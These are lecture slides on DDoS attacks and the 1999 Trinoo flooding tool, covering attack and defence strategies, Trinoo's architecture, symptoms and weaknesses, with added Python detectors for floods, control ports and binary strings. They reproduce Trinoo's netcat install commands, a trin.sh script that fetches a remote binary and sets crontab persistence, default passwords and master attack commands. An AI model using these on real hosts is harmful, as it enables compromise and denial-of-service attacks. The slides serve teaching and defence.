
An Introduction to DDoS

And the “Trinoo” Attack Tool

Acknowledgement: Ray Lam, Ivan Wong

Operating System Concepts 1.1
Outline

■ Background on DDoS
✦ Attack mechanism
✦ Ways to defend
■ The attack tool – Trinoo
✦ Introduction
✦ Attack scenario
✦ Symptoms and defense
✦ Weaknesses and next evolution

Background on DDoS

Attack mechanism

Denial-Of-Service

■ Flooding-based
■ Send packets to victims
✦ Network resources
✦ System resources
■ Traditional DOS
✦ One attacker
■ Distributed DOS
✦ Countless attackers

Attack Mechanism

[Figure: attack mechanism, two panels; A = attacker, R = reflector, V = victim]
■ Direct Attack: A → V: TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed)
■ Reflector Attack: A → R: TCP SYN, ICMP, UDP.. with V’s address as source IP address; R → V: TCP SYN-ACK, TCP RST, ICMP, UDP..

Attack Architecture
[Figure: attack architecture]
Attacker (A)
→ Masters (handlers)
→ Agents (Daemons or Zombies)
→ Direct Attack: Agents → V: TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed)
→ Reflector Attack: Agents → Reflectors: TCP SYN, ICMP, UDP.. (with V’s address as the source IP addresses); Reflectors → V: TCP SYN-ACK, TCP RST, ICMP, UDP..

Attack Methods

Attack              Attack packets                            Reply packets
Smurf               ICMP echo queries to broadcast address    ICMP echo replies
SYN flooding        TCP SYN packets                           TCP SYN ACK packets
RST flooding        TCP packets to closed ports               TCP RST packets
ICMP flooding       ■ ICMP queries                            ■ ICMP replies
                    ■ UDP packets to closed ports             ■ Port unreachable
                    ■ IP packets with low TTL                 ■ Time exceeded
DNS reply flooding  DNS queries (recursive) to DNS servers    DNS replies

BackScatter Analysis (Moore et al.)

■ Measured DOS activity on the Internet.
■ TCP (94+ %)
■ UDP (2 %)
■ ICMP (2 %)

TCP attacks based mainly on SYN flooding

Background on DDoS

Ways to defend

Strategy

■ Three lines of defense:
✦ Attack prevention – before the attack
✦ Attack detection and filtering – during the attack
✦ Attack source traceback – during and after the attack

Attack prevention

■ Protect hosts from installation of masters and agents by attackers
■ Scan hosts for symptoms of agents being installed
■ Monitor network traffic for known message exchanges among attackers, masters, agents

Attack prevention

■ Inadequate and hard to deploy
■ Users who do not care about security leave security holes
■ ISP and enterprise networks do not have incentives

Attack source traceback

■ Identify actual origin of packet
■ Without relying on source IP of packet
■ 2 approaches
✦ Routers record info of packets
✦ Routers send additional info of packets to destination

Attack source traceback

■ Source traceback cannot stop ongoing DDoS attack
✦ Cannot trace origins behind firewalls, NAT (network address translators)
✦ More to do for reflector attack (attack packets from legitimate sources)
■ Useful in post-attack law enforcement

Attack detection and filtering

■ Detection
✦ Identify DDoS attack and attack
packets
■ Filtering
✦ Classify normal and attack packets
✦ Drop attack packets

Attack detection and filtering

■ Can be done in 4 places
✦ Victim’s network
✦ Victim’s ISP network
✦ Further upstream ISP network
✦ Attack source networks
■ Dispersed agents send packets to single victim
■ Like pouring packets from top of funnel

Attack detection and filtering

[Figure: funnel of detection and filtering locations, top to bottom]
Attack source networks
Further upstream ISP networks
Victim’s ISP network
Victim’s network
Victim
Effectiveness of detection increases downward (towards the victim); effectiveness of filtering increases upward (towards the attack source networks)

Attack detection and filtering

■ Detection
✦ Easy at victim’s network – large amount of attack packets
✦ Difficult at individual agent’s network – small amount of attack packets
■ Filtering
✦ Effective at agents’ networks – less likely to drop normal packets
✦ Ineffective at victim’s network – more normal packets are dropped

D&F at agent’s network

■ Usually cannot detect DDoS attack
■ Can filter attack packets with address spoofed
✦ Attack packets in direct attacks
✦ Attack packets from agents to reflectors in reflector attacks
■ Ensuring that all ISPs install ingress packet filtering is impossible

D&F at victim’s network

■ Detect DDoS attack
✦ Unusually high volume of incoming traffic of certain packet types
✦ Degraded server and network performance
■ Filtering is ineffective
✦ Attack and normal packets have same destination – victim’s IP and port
✦ Attack packets have source IP spoofed or come from many different IPs
✦ Attack and normal packets indistinguishable

D&F at victim’s upstream ISP

■ Often requested by victim to filter attack packets
■ Alert protocol
✦ Victim cannot receive ACK from ISP
✦ Requires strong authentication and encryption
■ Filtering ineffective
■ ISP network may also be jammed

D&F at further upstream ISP

■ Backpressure approach
■ Victim detects DDoS attack
■ Upstream ISPs filter attack packets

The attack tool – Trinoo

Introduction

Introduction

■ Discovered in August 1999
■ Daemons found on Solaris 2.x systems
■ Attacked a system at the University of Minnesota
■ Victim unusable for 2 days

Attack type

■ UDP flooding
■ Default size of UDP packet: 1000 bytes
✦ malloc() buffer of this size and send uninitialized content
■ Default period of attack: 120 seconds
■ Destination port: randomly chosen from 0 – 65534

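Added example (not part of the slides or of Trinoo itself): a Python detector for the victim’s network that applies the rule from the “D&F at victim’s network” slide, “unusually high volume of incoming traffic of certain packet types”, to the traffic shape described above (UDP, 1000-byte packets, destination ports scattered over 0 – 65534). All packet records are constructed; the thresholds (500 packets/s, 6 bits of destination-port entropy) and the addresses are assumptions.

```python
"""Victim-side UDP flood detector (added example, not part of the slides or of
Trinoo). It keys on two things a victim can actually observe: the per-second
rate of UDP packets arriving for it, and how widely their destination ports
are spread. Normal UDP load concentrates on a few service ports (DNS, NTP);
a flood aimed at random ports does not. All packet records are constructed;
the thresholds are assumptions, not values from the slides."""
from collections import Counter, defaultdict
from dataclasses import dataclass
import math
import random


@dataclass(frozen=True)
class Packet:
    ts: float      # arrival time in seconds
    proto: str     # "udp", "tcp" or "icmp"
    src: str
    dst: str
    dport: int
    length: int


def port_entropy(ports):
    """Shannon entropy (bits) of a destination-port sample: 0 for a single
    service port, close to log2(n) when n packets hit n different random ports."""
    counts = Counter(ports)
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def detect_udp_flood(packets, victim, rate_threshold=500, entropy_threshold=6.0):
    """Return {second: stats} for each second in which UDP traffic to `victim`
    is both high-rate and spread over many destination ports. Requiring both
    keeps a busy resolver (high rate, one port) from tripping the rate rule."""
    per_second = defaultdict(list)
    for p in packets:
        if p.proto == "udp" and p.dst == victim:
            per_second[int(p.ts)].append(p)
    alerts = {}
    for sec, pkts in sorted(per_second.items()):
        rate = len(pkts)
        ent = port_entropy(p.dport for p in pkts)
        if rate >= rate_threshold and ent >= entropy_threshold:
            alerts[sec] = {
                "rate": rate,
                "port_entropy": round(ent, 2),
                "avg_len": sum(p.length for p in pkts) / rate,
                "sources": len({p.src for p in pkts}),
            }
    return alerts


def build_sample(victim="203.0.113.10"):
    """Constructed traffic: 20 benign DNS/NTP packets per second for 5 s, plus
    800 packets/s of 1000-byte UDP to random ports during seconds 2 and 3,
    from many (assumed spoofed) sources in a documentation range."""
    rng = random.Random(1)  # fixed seed so the outcome is reproducible
    pkts = []
    for sec in range(5):
        for i in range(20):
            src = f"10.0.{rng.randint(1, 5)}.{rng.randint(1, 250)}"
            pkts.append(Packet(sec + i / 20, "udp", src, victim, rng.choice([53, 123]), 80))
    for sec in (2, 3):
        for i in range(800):
            src = f"198.51.100.{rng.randint(1, 254)}"
            pkts.append(Packet(sec + i / 800, "udp", src, victim, rng.randint(0, 65534), 1000))
    return pkts


if __name__ == "__main__":
    for sec, stats in detect_udp_flood(build_sample(), "203.0.113.10").items():
        print(f"t={sec}s  UDP flood suspected: {stats}")
```

Only seconds 2 and 3 fire: the benign seconds have 20 packets on two ports (entropy about 1 bit), the flood seconds have about 820 packets spread over roughly 800 ports. As the following slides stress, this is detection only; attack and normal packets still share the victim’s destination address, so dropping packets on the same evidence would discard normal traffic too.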
The attack tool – Trinoo

Attack scenario

Installation

1. Hack an account
✦ Acts as repository
✔ Scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.
✦ Requirements
✔ High bandwidth connection
✔ Large number of users
✔ Little administrative oversight

Installation

2. Compromise systems
✦ Look for vulnerable systems
✔ Unpatched Sun Solaris and Linux
✦ Remote buffer overflow exploitation
✔ Set up root account
✔ Open TCP ports
✦ Keep a `friend list`

Installation

3. Install daemons
✦ Use “netcat” (“nc”) and “trin.sh”

./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &

✦ netcat
✔ Network version of “cat”
✦ trin.sh
✔ Shell script to set up daemons

Installation

■ trin.sh

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"

Architecture

[Figure: Trinoo architecture (direct attack)]
Attacker → Masters (handlers) → Agents (Daemons or Zombies) → Victim

Communication ports

[Figure: communication ports]
Attacker → Master: TCP port 27665
Master → Daemon: UDP port 27444
Daemon → Master: UDP port 31335

■ Monitor these specific ports to detect the presence of a master or an agent

Password protection

■ Password used to prevent administrators or other hackers from taking control
■ Encrypted password compiled into master and daemon using crypt()
■ Clear-text password is sent over network – session is not encrypted
■ Received password is encrypted and compared

Password protection

■ Default passwords
✦ “l44adsl” – trinoo daemon password
✦ “gOrave” – trinoo master server startup
✦ “betaalmostdone” – trinoo master remote
interface password
✦ “killme” – trinoo master password to
control “mdie” command

Operating System Concepts 1.34
Login to master

■ Telnet to port 27665 of the host with master
■ Enter password “betaalmostdone”
■ Warns if others try to connect to the master

[root@r2 root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>

Master and daemon

■ Communicate by UDP packets
■ Command line format
✦ arg1 password arg2
■ Default password is “l44adsl”
■ When daemon starts, it sends “HELLO” to master
■ Master maintains list of daemons

Master commands

■ dos IP
✦ DoS the IP address specified
✦ “aaa l44adsl IP” sent to each daemon
■ mdos <ip1:ip2:ip3>
✦ DoS the IPs simultaneously
■ mtimer N
✦ Set attack period to N seconds

Operating System Concepts 1.37
Master commands

■ bcast
✦ List all daemons’ IP
■ mdie password
✦ Shutdown all daemons
■ killdead
✦ Invite all daemons to send “HELLO” to master
✦ Delete all dead daemons from the list

Daemon commands

■ Not directly used; only used by master to send commands to daemons
■ Consist of 3 letters
✦ Makes the commands harder to expose with the Unix command “strings” on the binary

Daemon commands

■ aaa password IP
✦ DoS specified IP
■ bbb password N
✦ Set attack period to N seconds
■ rsz password N
✦ Set attack packet size to N bytes

Operating System Concepts 1.40
The attack tool – Trinoo

Symptoms and defense

Operating System Concepts 1.41
Symptoms

■ Masters
✦ Crontab
✔ * * * * * /usr/sbin/rpc.listen
✦ Friend list
✔ Files “...” and “...-b”

# ls -l ... ...-b
-rw------- 1 root root 25 Sep 26 14:46 ...
-rw------- 1 root root 50 Sep 26 14:30 ...-b

Symptoms

■ Masters (Con’t)
✦ Socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:27665 *:* LISTEN
...
udp 0 0 *:31335 *:*
...

Operating System Concepts 1.43
Symptoms

■ Masters (Con’t)
✦ File status

# lsof | egrep ":31335|:27665"
master 1292 root 3u inet 2460 UDP *:31335
master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)

# lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
master 1292 root cwd DIR 3,1 1024 14356 /tmp/...
master 1292 root rtd DIR 3,1 1024 2 /
master 1292 root txt REG 3,1 30492 14357 /tmp/.../master
master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so

Symptoms

■ Daemons
✦ Socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
...
udp 0 0 *:1024 *:*
udp 0 0 *:27444 *:*
...

Operating System Concepts 1.45
Symptoms

■ Daemons (Con’t)
✦ File status

# lsof | egrep ":27444"
ns 1316 root 3u inet 2502 UDP *:27444

# lsof -p 1316
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ns 1316 root cwd DIR 3,1 1024 153694 /tmp/...
ns 1316 root rtd DIR 3,1 1024 2 /
ns 1316 root txt REG 3,1 6156 153711 /tmp/.../ns
ns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
ns 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
ns 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so

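Added example (not part of the slides or of Trinoo itself): a Python check that parses the “netstat -a --inet” format shown on the symptom slides and flags listeners on the ports the “Communication ports” slide assigns to the master (27665/tcp, 31335/udp) and the daemon (27444/udp). The three netstat listings are constructed in the slide format, not real captures.

```python
"""Host-side check for Trinoo listener sockets (added example, not from the
slides or from Trinoo). Parses `netstat -a --inet` output and reports sockets
on the default control ports. The listings at the bottom are constructed."""

# (proto, port) -> (role, direction), as given on the "Communication ports" slide
TRINOO_PORTS = {
    ("tcp", 27665): ("master", "attacker -> master remote interface"),
    ("udp", 31335): ("master", "daemon -> master"),
    ("udp", 27444): ("daemon", "master -> daemon"),
}


def parse_netstat(text):
    """Yield (proto, local_port, state) for each tcp/udp line of `netstat -a --inet`.
    Header lines and sockets shown with a service name (e.g. *:ssh) are skipped."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue
        port = fields[3].rsplit(":", 1)[-1]      # "Local Address" column, e.g. "*:27665"
        if not port.isdigit():
            continue
        state = fields[5] if len(fields) > 5 else ""   # UDP rows carry no State column
        yield fields[0], int(port), state


def find_trinoo_sockets(text):
    """Return [(proto, port, role, direction)] for sockets on the known ports."""
    hits = []
    for proto, port, _state in parse_netstat(text):
        match = TRINOO_PORTS.get((proto, port))
        if match:
            hits.append((proto, port) + match)
    return hits


def classify_host(text):
    """Set of roles ('master', 'daemon') the socket table suggests; empty if none."""
    return {hit[2] for hit in find_trinoo_sockets(text)}


# Constructed listings in the slide format (not real captures).
MASTER_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp        0      0 *:27665                 *:*                     LISTEN
udp        0      0 *:31335                 *:*
udp        0      0 *:syslog                *:*
"""

DAEMON_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
"""

CLEAN_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp        0      0 *:www                   *:*                     LISTEN
"""

if __name__ == "__main__":
    for name, text in (("master", MASTER_NETSTAT), ("daemon", DAEMON_NETSTAT), ("clean", CLEAN_NETSTAT)):
        print(name, classify_host(text) or "no Trinoo ports")
```

The ports are compile-time defaults, so a hit is a lead to confirm with “lsof -p” as the slides do, and an empty result does not clear the host. That is the same trade-off the “Defenses” slide makes when it blocks high-numbered UDP ports.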
Defenses

■ Prevent root level compromise
✦ Patch systems
✦ Set up firewalls
✦ Monitor traffic
■ Block abused ports
✦ High numbered UDP ports
✦ Trade-off
✔ Also blocks normal programs using the same ports

The attack tool – Trinoo

Weaknesses and next evolution

Operating System Concepts 1.48
Weaknesses

■ Single kind of attack
✦ UDP flooding
✦ Easily defended by single defense tools
■ Use IP as destination address
✦ “Moving target defense” – victim changes IP to avoid attack

Weaknesses

■ Password, encrypted password, commands visible in binary images
✦ Use Unix command “strings” to obtain them
- strings master
- strings -n3 ns
✦ Check if Trinoo found
✦ Crack the encrypted passwords

Weaknesses

■ Password travels in plain text in network
✦ Daemon password frequently sent in master-to-daemon commands
✦ Get password by “ngrep”, “tcpdump” which show UDP payload

Uproot a Trinoo network

■ Locate a daemon
■ Use “strings” to obtain IPs of masters
■ Contact sites with master installed
■ Those sites check list of daemons
✦ By inspecting file “...” or getting master login password and using “bcast” command
✦ Get “mdie” password
✦ Use “mdie” to shut down all daemons
✦ Repeat “mdie” periodically as daemons are restarted by crontab

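Added example (not part of the slides or of Trinoo itself): a Python reimplementation of the strings pass (“strings -n3”) that the “Weaknesses” slide uses to expose commands and passwords in the binary, and that the uproot procedure above uses to obtain master IPs from a daemon. It filters the recovered strings for the three-letter daemon commands, the HELLO marker and dotted-quad addresses. The sample “binary” is a constructed byte blob, not a real Trinoo file.

```python
"""Triage of a suspect binary with a strings pass (added example, not from the
slides or from Trinoo). `strings` prints runs of printable bytes; with -n3 the
three-letter daemon commands survive the default minimum length of 4. The
sample blobs below are constructed."""
import re

_PRINTABLE = range(0x20, 0x7F)   # space through tilde, as `strings` counts them
_IPV4_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")
DAEMON_COMMANDS = ("aaa", "bbb", "rsz")   # from the "Daemon commands" slide


def strings(data, min_len=3):
    """Runs of at least `min_len` printable ASCII bytes, like `strings -n<min_len>`."""
    found, run = [], bytearray()
    for byte in data + b"\x00":          # the sentinel flushes a trailing run
        if byte in _PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def is_ipv4(s):
    m = _IPV4_RE.match(s)
    return bool(m) and all(int(octet) <= 255 for octet in m.groups())


def triage(data):
    """Summarise what a strings pass reveals about a suspect binary."""
    found = strings(data, 3)
    commands = [s for s in found if s in DAEMON_COMMANDS]
    ips = [s for s in found if is_ipv4(s)]
    hello = any("HELLO" in s for s in found)
    return {
        "commands": commands,
        "master_ips": ips,        # for a daemon: the masters it reports to
        "hello": hello,
        "looks_like_trinoo": len(set(commands)) == len(DAEMON_COMMANDS) and hello,
    }


# Constructed blob standing in for a stripped daemon binary: ELF magic, opaque
# bytes, then the kind of strings the slides say remain in the clear.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + bytes(range(0, 32)) * 4
    + b"aaa\x00bbb\x00rsz\x00HELLO\x00"
    + b"192.0.2.7\x00192.0.2.8\x00"          # documentation-range "master" addresses
    + b"/usr/sbin/rpc.listen\x00"
    + b"\xff\xfe\x00\x01ok\x00"              # "ok" is shorter than 3 bytes: dropped
)

# Constructed blob for an ordinary program, to show the filter stays quiet.
BENIGN_BINARY = b"\x7fELF\x01\x01" + b"Usage: %s [-v] file\x00" + b"1.2.3\x00"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_BINARY), ("benign", BENIGN_BINARY)):
        print(name, triage(blob))
```

On the constructed daemon blob the filter returns the three commands, the HELLO marker and both master addresses, which is the lead the uproot procedure needs to contact the sites hosting the masters; the benign blob yields nothing. The “looks_like_trinoo” verdict is a heuristic on the slide’s strings, not proof, and a binary built with the “Next evolution” changes (encrypted embedded strings) would not show these at all.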
Next evolution

■ Combination of several attack types
✦ SYN flood, UDP flood, ICMP flood…
✦ Higher chance of successful attack
■ Stronger encryption of embedded strings, passwords
■ Use encrypted communication channel
■ Communicate by a protocol that is difficult to detect or block, e.g. ICMP

References

■ R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002
■ D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999

